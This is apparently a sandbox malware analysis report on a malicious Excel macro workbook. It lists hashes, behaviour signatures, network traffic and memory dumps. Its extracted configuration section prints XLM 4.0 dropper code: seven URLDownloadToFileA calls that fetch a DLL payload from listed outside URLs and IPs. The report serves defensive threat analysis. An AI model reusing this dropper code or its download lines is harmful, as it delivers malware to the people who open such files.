Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

c8e18f4eb2...a.xlsm

windows7-x64

10

c8e18f4eb2...a.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/11/2024, 22:50 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c8e18f4eb2ca9bb8c6a1e6c59eb6fd57c752e93c87efe4fe4e974963cc20f8da.xlsm

  • Size

    21KB

  • MD5

    05b93aed69dfea0b593ee4c21505f757

  • SHA1

    44f397a0a48da8159cd8c89fe88e2819e83759ca

  • SHA256

    c8e18f4eb2ca9bb8c6a1e6c59eb6fd57c752e93c87efe4fe4e974963cc20f8da

  • SHA512

    e1f17a6f29fd28ec3dfe2c33aab50f4c66f7301c30bc743af3632fd72e2f35b057b7a1431a8f98e0008654ac20d854c3534d9c77e6efcfea59d441f90b567483

  • SSDEEP

    384:Y8c5hAuAi/NjxhS8EibbwBlwcSYrLb5CzgObff9kC+xbX7T/1SeyB:YPksNPzXSFCBn9kC+xbLTc9

Score
10/10
discovery

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://astroadvicebaba.com/assets/jYlBTPcWJTsTtamDfX/", "..\rfs.dll")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://physioacademy.co.uk/conditions/8I3WSx5t2k/", "..\rfs.dll")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://orchidbg.com/aeeiludqootr/OcnjiLHL/", "..\rfs.dll")
4
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://westthamesphysio.com/blog/3tsZIz09Sox1Z/", "..\rfs.dll")
5
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://snappylookphotobooth.com/headers/P/", "..\rfs.dll")
6
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://194.59.165.91/nbproject/1XFiatvBCRW9eh5JxptS/", "..\rfs.dll")
7
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://casadorothea.com/cc/H5v/", "..\rfs.dll")
URLs
xlm40.dropper

http://astroadvicebaba.com/assets/jYlBTPcWJTsTtamDfX/
xlm40.dropper

https://physioacademy.co.uk/conditions/8I3WSx5t2k/
xlm40.dropper

http://orchidbg.com/aeeiludqootr/OcnjiLHL/
xlm40.dropper

https://westthamesphysio.com/blog/3tsZIz09Sox1Z/
xlm40.dropper

http://snappylookphotobooth.com/headers/P/
xlm40.dropper

http://194.59.165.91/nbproject/1XFiatvBCRW9eh5JxptS/
xlm40.dropper

http://casadorothea.com/cc/H5v/

Signatures

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c8e18f4eb2ca9bb8c6a1e6c59eb6fd57c752e93c87efe4fe4e974963cc20f8da.xlsm
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3028

Network

  • flag-us
    DNS
    astroadvicebaba.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    astroadvicebaba.com
    IN A
    Response
  • flag-us
    DNS
    physioacademy.co.uk
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    physioacademy.co.uk
    IN A
    Response
    physioacademy.co.uk
    IN A
    92.205.239.100
  • flag-us
    DNS
    orchidbg.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    orchidbg.com
    IN A
    Response
    orchidbg.com
    IN A
    192.254.225.105
  • flag-us
    GET
    http://orchidbg.com/aeeiludqootr/OcnjiLHL/
    EXCEL.EXE
    Remote address:
    192.254.225.105:80
    Request
    GET /aeeiludqootr/OcnjiLHL/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: orchidbg.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 503 Service Unavailable
    Date: Wed, 20 Nov 2024 22:51:03 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Last-Modified: Tue, 04 Jun 2024 08:46:18 GMT
    Accept-Ranges: bytes
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 465
    Content-Type: text/html
  • flag-us
    DNS
    westthamesphysio.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    westthamesphysio.com
    IN A
    Response
    westthamesphysio.com
    IN A
    92.205.239.100
  • flag-us
    DNS
    snappylookphotobooth.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    snappylookphotobooth.com
    IN A
    Response
    snappylookphotobooth.com
    IN A
    192.124.249.17
  • flag-us
    GET
    http://snappylookphotobooth.com/headers/P/
    EXCEL.EXE
    Remote address:
    192.124.249.17:80
    Request
    GET /headers/P/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: snappylookphotobooth.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: Sucuri/Cloudproxy
    Date: Wed, 20 Nov 2024 22:51:04 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 315
    Connection: keep-alive
    X-Sucuri-ID: 13017
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    X-Sucuri-Cache: EXPIRED
  • flag-sg
    GET
    http://194.59.165.91/nbproject/1XFiatvBCRW9eh5JxptS/
    EXCEL.EXE
    Remote address:
    194.59.165.91:80
    Request
    GET /nbproject/1XFiatvBCRW9eh5JxptS/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 194.59.165.91
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 20 Nov 2024 22:51:04 GMT
    Content-Type: text/html
    Content-Length: 148
    Connection: keep-alive
    ETag: "66e00399-94"
  • flag-us
    DNS
    casadorothea.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    casadorothea.com
    IN A
    Response
  • 92.205.239.100:443
    physioacademy.co.uk
    tls
    EXCEL.EXE
    400 B
     219 B
     5
    5
  • 92.205.239.100:443
    physioacademy.co.uk
    tls
    EXCEL.EXE
    362 B
     219 B
     5
    5
  • 92.205.239.100:443
    physioacademy.co.uk
    tls
    EXCEL.EXE
    288 B
     219 B
     5
    5
  • 92.205.239.100:443
    physioacademy.co.uk
    EXCEL.EXE
    190 B
     92 B
     4
    2
  • 192.254.225.105:80
    http://orchidbg.com/aeeiludqootr/OcnjiLHL/
    http
    EXCEL.EXE
    839 B
     932 B
     11
    4

    HTTP Request

    GET http://orchidbg.com/aeeiludqootr/OcnjiLHL/

    HTTP Response

    503
  • 92.205.239.100:443
    westthamesphysio.com
    tls
    EXCEL.EXE
    401 B
     219 B
     5
    5
  • 92.205.239.100:443
    westthamesphysio.com
    tls
    EXCEL.EXE
    363 B
     219 B
     5
    5
  • 92.205.239.100:443
    westthamesphysio.com
    tls
    EXCEL.EXE
    288 B
     219 B
     5
    5
  • 92.205.239.100:443
    westthamesphysio.com
    EXCEL.EXE
    190 B
     92 B
     4
    2
  • 192.124.249.17:80
    http://snappylookphotobooth.com/headers/P/
    http
    EXCEL.EXE
    615 B
     1.5kB
     6
    6

    HTTP Request

    GET http://snappylookphotobooth.com/headers/P/

    HTTP Response

    404
  • 194.59.165.91:80
    http://194.59.165.91/nbproject/1XFiatvBCRW9eh5JxptS/
    http
    EXCEL.EXE
    619 B
     529 B
     6
    5

    HTTP Request

    GET http://194.59.165.91/nbproject/1XFiatvBCRW9eh5JxptS/

    HTTP Response

    404
  • 8.8.8.8:53
    astroadvicebaba.com
    dns
    EXCEL.EXE
    65 B
     138 B
     1
    1

    DNS Request

    astroadvicebaba.com

  • 8.8.8.8:53
    physioacademy.co.uk
    dns
    EXCEL.EXE
    65 B
     81 B
     1
    1

    DNS Request

    physioacademy.co.uk

    DNS Response

    92.205.239.100

  • 8.8.8.8:53
    orchidbg.com
    dns
    EXCEL.EXE
    58 B
     74 B
     1
    1

    DNS Request

    orchidbg.com

    DNS Response

    192.254.225.105

  • 8.8.8.8:53
    westthamesphysio.com
    dns
    EXCEL.EXE
    66 B
     82 B
     1
    1

    DNS Request

    westthamesphysio.com

    DNS Response

    92.205.239.100

  • 8.8.8.8:53
    snappylookphotobooth.com
    dns
    EXCEL.EXE
    70 B
     86 B
     1
    1

    DNS Request

    snappylookphotobooth.com

    DNS Response

    192.124.249.17

  • 8.8.8.8:53
    casadorothea.com
    dns
    EXCEL.EXE
    62 B
     62 B
     1
    1

    DNS Request

    casadorothea.com

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3028-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3028-1-0x0000000071E8D000-0x0000000071E98000-memory.dmp

    Filesize

    44KB

    Download

  • memory/3028-4-0x0000000071E8D000-0x0000000071E98000-memory.dmp

    Filesize

    44KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.